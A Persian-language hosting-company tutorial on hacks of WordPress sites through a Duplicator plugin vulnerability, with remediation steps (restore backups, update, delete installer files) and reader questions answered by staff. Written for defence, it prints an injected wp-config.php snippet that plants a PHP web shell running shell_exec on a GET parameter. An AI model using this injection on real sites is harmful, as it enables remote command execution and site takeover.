آموزش های وردپرس

آسیب پذیری بسیار خطرناک در افزونه Duplicator وردپرس

در طی این دو ماه گذشته متاسفانه وردپرس مورد حمله هکرها در سطح جهان قرار گرفته است که همین موضوع باعث قرارگیری وردپرس در برابر هک گسترده شده است. ماه گذشته شاهد این بودیم که فایل wp-config.php وردپرس در بسیاری از سایت‌ها به صورت خودکار حذف شده و هنگام مراجعه به سایت با صفحه نصب وردپرس مواجه میشدیم. طی چند روز گذشته نیز بسیاری از سایت‌های وردپرسی که از افزونه Duplicator استفاده می‌کنند مورد حمله قرار گرفته و از طریق کنترل و اجرای دستورات از راه دور توسط هکرها مورد هک قرار گرفته‌اند.

در این مقاله از پایگاه دانش میزبان‌فا به بررسی هک سایت‌های وردپرسی توسط افزونه Duplicator میپردازم که اگر از این افزونه استفاده میکنید و در معرض هک در سایت قرار گرفته‌اید با استفاده از این آموزش قادر به برطرف کردن مشکلات خود باشید.

خطر هک گسترده در وردپرس توسط افزونه Duplicator

همانطور که می‌دانید افزونه Duplicator وردپرس امکان ساخت بسته نصب آسان در وردپرس را به شما میده که با این افزونه میتونید از محتوا و تنظیمات کامل یک وبسایت یک نسخه به صورت کپی شده تهیه کرده و سپس با استفاده از نصب بسته آسان در وردپرس همین نسخه کپی شده را در سایت دیگر و با دامنه‌ای متفاوت بدون اینکه نیاز باشه صفحات را از نو طراحی کنید، انتقال بدین. بنابراین استفاده از این افزونه بسیار بالا بوده و این افزونه تاکنون موفق شده بیش از یک میلیون نصب فعال در مخزن وردپرس رو ازآن خودش بکنه که فروش قالب‌های وردپرس با استفاده از این افزونه هم باعث شده تا میزان استفاده از این افزونه رقمی بالای 10 میلیون رو به خودش اختصاص بده.

چطور افزونه Duplicator باعث هک سایت خواهد شد؟

همونطور که میدونید با استفاده از این افزونه کلیه تنظیمات و اطلاعات دیتابیس، قالب وردپرس، افزونه‌های وردپرس و به طور کلی هر اطلاعاتی که در وردپرس دارید این امکان رو پیدا میکنه که یک نسخه خروجی ازش تهیه کنید. در این نسخه خروجی شما دو فایل installer.php و فایی که شامل محتویات سایت و دیتابیس هست رو خواهید داشت که با استفاده از فایل database.sql هم امکان درون ریزی داده‌های دیتابیس در سایت جدید فراهم خواهد شد.

حالا وقتی که تصمیم به نصب قالب با استفاده از بسته نصبی در سایت خودتون میگیرید، فایل‌های database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایل‌های پیشفرض وردپرس قرار میگیرند. مشکل هک وردپرس درست از همینجا آغاز میشه که به دلیل وجود باگ در این افزونه باعث میشه که هکر بتونه امکان دو بار نصب وردپرس رو به دست بیاره که یک بار هم مشابه همین مشکل در سال گذشته رخ داد و باعث هک بسیاری از سایت‌های وردپرسی شد.

این موضوع باعث میشه که هکر در مرحله اول سایت شما را ریست بکنه و با ارسال یک سری فایل مخرب فایل wp-config.php وردپرس را ویرایش کرده و از نو بازنویسی بکنه که این مسئله اولین قدم برای از دست خارج شدن سایت هست. طی بررسی که روی چند فایل wp-config.php برخی سایت‌ها داشتیم کدهای این فایل به شکل زیر تغییر کرده بودند.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test
'); file_put_contents("test.php", '<pre><?php if
(isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>');
/
*
');
/** MySQL database username */
define('DB_USER', 'test');
/** MySQL database password */
define('DB_PASSWORD', 'test');
/** MySQL hostname */
define('DB_HOST', 'nowhere:12345');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

همونطور که میبینید اطلاعات دیتابیس به صورت کلی از بین رفته و با چیز دیگه جایگزین شده و علاوه بر این هم یک سری کد در این فایل تزریق شده که باعث شده هکر یک درب پشتی برای هک مجدد برای خودش ایجاد بکنه. بعد از این هک گسترده معمولا با دو مشکل اساسی مواجه خواهید شد.

  • وقتی با دستکتاپ وارد سایتتون بشید با خطای 500 در وردپرس مواجه می‌شوید.
  • وقتی با موبایل وارد سایت شوید با ریدایرکت شدن از چند آدرس به آدرس دیگه در نهایت به شکلی به صفحات تبلیغ و اسپم هدایت خواهید شد.

مسئله بعدی که رخ میده اینه که علاوه بر فایل‌های پیشفرض وردپرس یک سری فایل php و web.config دیگه هم در public_html سایت شما اضافه خواهد شد. که تمامی مشکلات و هک شدن سایت به خاطر پاک نکردن فایل installer.php و عدم آپدیت این افزونه به وجود اومده.

راهکار چیست؟ چطور سایت هک شده را برگردانیم؟

اولین کاری که باید انجام بدین این هست که آخرین نسخه بک آپ وردپرس را بازگردانی کنید که به صورت سالم هست. برای این کار میتونید از میزبانی هاست خودتون بخواین که آخرین نسخه بک آپ رو در سایت شما جایگزین بکنه. سپس نسخه آپدیت شده افزونه Duplicator وردپرس که بعد از این بررسی شده و مشکل هک برطرف شده را از مخزن وردپرس دانلود کنید. اگر به پیشخوان وردپرس دسترسی داشتید اقدام به آپدیت افزونه بکنید و در صورت عدم دسترسی هم میتونید با استفاده از راهنمای نصب افزونه در وردپرس به صورت دستی و از طریق هاست افزونه را آپدیت کنید.

بعد از اینکه افزونه duplicator وردپرس آپدیت شد، با استفاده از مقاله افزایش امنیت وردپرس و اسکن امنیتی وردپرس با Wordfence Security و نصب افزونه امنیتی در وردپرس، سایت خودتون رو آنالیز و بررسی کرده و از هک مجدد جلوگیری کنید.

از اونجایی که به این افزونه احتیاجی نخواهید داشت سعی کنید سریعا بعد از آپدیت از سایت حذفش کنید و در نهایت فایل‌های database.sql، installer.php، installer-backup.php، installer-log.txt و installer-data.sql که در هاست قرار داره رو هم پاک کنید.

برای سهولت امر می توانید از پیشخوان وردپرس به منوی duplicator و سپس زیر منوی tools مراجعه نمایید. سپس روی دکمه Remove Installation Files کلیک نمایید تا فایل های مربوطه حذف شوند.

بعد از انجام این کار میتونید از خطر هک مجدد جلوگیری کنید. اگر هم تا کنون سایت شما مورد هک قرار نگرفته حتما همه این راهکارها رو دنبال کنید، چرا که این باگ به صورت گسترده است و تا زمانی که از آخرین نسخه افزونه استفاده نکنید، سایت هک خواهد شد.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید اقدام به رفع مشکل و جلوگیری از هک وردپرس توسط افزونه duplicator بکنید. در صورتی که در رابطه با این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید.
4.5/5 - (16 امتیاز)
تصویر علی یزدان پرست

علی یزدان پرست

حدود 8 سالی هست که در زمینه میزبانی وب به صورت تخصصی فعالیت می کند و علاقه زیادی به کسب تجربه در زمینه بازاریابی اینترنتی و تجارت الکترونیک دارد، علی یک کارآفرین خستگی ناپذیر است و با انرژی حیرت انگیزی تمام قسمت های میزبان فا را توسعه می دهد، علی به سبک حرفه ای و انحصاری خود زندگی می کند و خط فکری خاصی را همیشه دنبال می کند، او رفتار هایی کاملا متفاوت نسبت به سایر مدیرانی که تا به حال دیده اید دارد...

‫۳۲ دیدگاه ها

  1. سلام جناب صادقی عزیز،
    من این خبر رو مدتی قبل شنیدم و با توجه به اینکه به افزونه مذکور نیازی نداشتم افزونه داپلیکتور رو کلا حذف کردم. همین کار به تنهایی کافی نیست؟

    پاسخ

  2. سلام
    من الان سایتم هک شده و نسخه پشتیبان سایتم هم موجود نیست
    برای رفع مشکل باید چیکار کنم و چطوری این تروجانرو پاک کنم
    الان وردپرس و افزونه هارو آپدیت کردم ولی قسمت نوشته های سایتم که کلیک میکنم همچنان ریدایرکت میشه
    ممنون میشم پاسخ بدید

    پاسخ

    1. سلام جواد جان،
      اگر هاست خریداری کردید و به صورا اختصاصی استفاده نمی‌کنید، از میزبانی هاستتون درخواست کنید که آخرین بک آپی که دارن رو برای سایتتون ریستور کنند. در غیر این صورت باید از یک متخصص وردپرس برای بررسی کامل سایتتون و رفع مشکل کمک بگیرید.
      از اونجایی که این هک گسترده به خاطر وجود باگ بوده هر هکر به صورت سلیقه‌ای عمل کرده و طوری نیست که بگیم تو همه سایت‌ها به صورت عمومی یک کار انجام گرفته که با این روش‌ها برطرف بشه.

      پاسخ

  3. سلام
    فایل هایی که فرمودید حذف شود به صورت مستقیم در public html بود اما فایلی مثل database.php در افزونه wp rocket یافت شد. آیا باید حذف شود و یا این فایل مربوط به افزونه هست؟ چون در یک وب سایت دیگه هم که چک شد این فایل در همین افزونه یافت شد.

    پاسخ

  4. سلام دوست عزیز
    پشتیبانی اعلام کرده سایت من هک شده
    ولی هیچ کدوم ازعلائمی که شماگفتید رو نداره
    الان من نمیدونم سایتم هک شده یا نه
    لطفا راهنمایی کنید
    ممنون

    پاسخ

    1. سلام، این هک طوری نبوده که در همه سایت‌ها یکسان باشه. بیشتر سایت‌های بررسی شده اتفاقی که براشون افتاد داخل این مقاله گفته شده، حالا ممکنه سایت شما به شکل دیگه هک شده باشه. برای این کار بهتره از یک متخصص کمک بگیرید.

      پاسخ

  5. سلام اگر .یراشگر حذف بشه ازکدم افزونه برای ویراش استفاده کنیم؟
    منظورم اینکه که به صورت دستی از cpanel انجام بدیم؟

    پاسخ

    1. سلام،
      اگه منظورتون ویرایشگر وردپرس هست باید وردپرس رو دانلود کنید و فایل wp-config.php و پوشه wp-content رو از داخلش حذف کنید. بعد باقی پوشه‌ها و فایل‌ها رو جایگزین پوشه و فایل فعلی در هاست بکنید.

      پاسخ

  6. سلام سایت بنده نیز با همین مشکل مواجه هست و این که نمی دونم کدوم بکاپ سالم از کجا می توان از سالم بودن بکاپ اطمینان حاصل کنم ممنون

    پاسخ

  7. سلام
    در public فایل database.php برای من وجود نداشت. ولی بقیه رو حذف کردم
    بجاش فایلی هست با نام database.sql منظور همون .php یا این فایل دیگه ای؟
    پاک کنم؟

    پاسخ

  8. ممنون مهندس
    لطفا در مورد امنیت وردپرس مقاله های بیشتری بنویسید.
    گاهی اوقات مدیران ضررهای میلیونی میکنن بخاطر پاک شدن اطلاعات…
    جناب صادقی سوالی که ذهنم رو مشغول کرده اینه که چطور با این پسورد های پیچیده که ورد پرس برا دیتا بیس تعریف میکنه هکرها بازم به سی پنل نفوذ میکنن؟ سوال دوم هدفشون چیه؟

    پاسخ

    1. سلام، ممنون از شما
      این مسئله میتونه دلایل مختلفی داشته باشه و نفوذ به سی پنل اگه رخ بده نشون دهنده ضعف میزبانی در تامین امنیت سی پنل خواهد بود. البته در برخی موارد کاربران خودشون هم باید موارد امنیتی رو رعایت کنند. مثل استفاده از آموزش تایید دو مرحله ای سی پنل
      هدف میتونه هر چیزی باشه 🙂

      پاسخ

  10. سلام سایت من همین مشکل براش پیش اومده. از فایل های installer-backup و installer-data و installer-log دو سری موجود هست. یکی در public_html و یکی در public_html/wp . کدوم سری باید پاک بشن؟ البته فایل installer.php و database.sql ندارم.

    پاسخ

    1. سلام روزبخیر؛
      دقیقا در محلی که قالبتون رو نصب کردید باید فایل های مذکور رو جستجو کنید.
      به عنوان مثال اگر قالب در پابلیک هاستتون نصب شده این فایل ها رو دقیقا در public_html میبینید. یا به عنوان مثال اگر در ساب دایرکتوری wp نصب انجام شده این فایل ها رو در دایرکتوری wp میبینید.

      پاسخ

  11. با سلام
    جناب آقای صادقی اخیرا دو بار بدلیل تغییر نام کاربری مدیریت وردپرس توسط هکر نتونستم وارد وردپرس بشم که هر بار از طریق دیتا بیس
    نام کاربریم را عوض میکنم و بعد وارد مدیریت میشم.
    لازم به ذکر است هکر در جدول wp_users.sql فقط قسمت user_login را به نام wild تغییر میدهد و بقیه قسمتها را نه.
    لطفا راهنمایی فرمایید چجوری میتونم راه نفوذ را ببندم.
    ممنون و سپاس

    پاسخ

  12. سلام روز بخیر با پاک کردن فایل نصبی از پابلیک مشکل حل میشه ؟ و دیگه هک صورت نمیگیره بنده هک شدم و نگرانم که مجددا اطلاعاتم از بین بره لطفا راهنماییم کنیم

    پاسخ

    1. سلام روز بخیر؛
      وجود یکسری فایل ها در مسیر نصب قالب، باعث نفوذپذیری میشه پس پاک کردن این فایل ها یکی از راه های نفوذپذیری امنیتی را مسدود میکنه.
      اگر هک شده باشید صرفا پاک کردن یکسری فایل مشکلتون رو رفع نمیکنه و هاستتون باید حتما بازنگری و پاکسازی بشه.
      کدهای قالب رو هم بررسی کنید بک دور داخل کدها وجود نداشته باشه. به صورت کامل هاستتون اسکن امنیتی بشه.

      پاسخ

  13. سلام. مرسی از مقاله تون.
    جسارتا من فکر میکنم یک جا اشتباه تایپی رخ داده. اواخر مقاله، در بخش حذف فایلها، فرمودین فایل database.php باید حذف بشه. در صورتی که این فایل موجود نیست. فکر میکنم منظورتون فایل database.sql بوده درسته؟

    پاسخ

    1. سلام روزبخیر؛
      فایل های زیر را باید در هاستتون در مسیر نصب قالب جستجو کنید:

      installer.php
      installer-backup.php
      installer-data.sql
      database.sql
      installer-log.txt
      ممکنه اسم فایلتون حاوی اعداد هم باشه.

      پاسخ

  14. سلام نصب و راه اندازی افزونه wordfance خیلی با آموزش های شما فرق داره. من الان شدیدا بهش نیاز دارم. چجوری میتونم راهنمایی بگیرم؟

    پاسخ

    1. سلام و احترام؛
      بله این آموزش بر اساس نسخه های قبلی نوشته شده در برنامه کاری آپدیت این مورد رو هم قرار دادیم.

      پاسخ

      1. بسیار عالی و متشکرم. حتما بهمون اطلاع بدید ممنون میشم

        پاسخ

  15. سلام
    استفاده از افزونه های رایگان وردپرس مشکل امنیتی میاره؟
    آخه شنیدم افزونه رایگان رو نصب نکنید درسته؟

    پاسخ

    1. سلام و احترام؛
      استفاده از افزونه های نال شده را پیشنهاد نمی کنیم.
      در خصوص افزونه های غیر تجاری و رایگان هم این نکته را در نظر بگیرید که حتما از منابع معتبر دانلود کنید.

      پاسخ

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *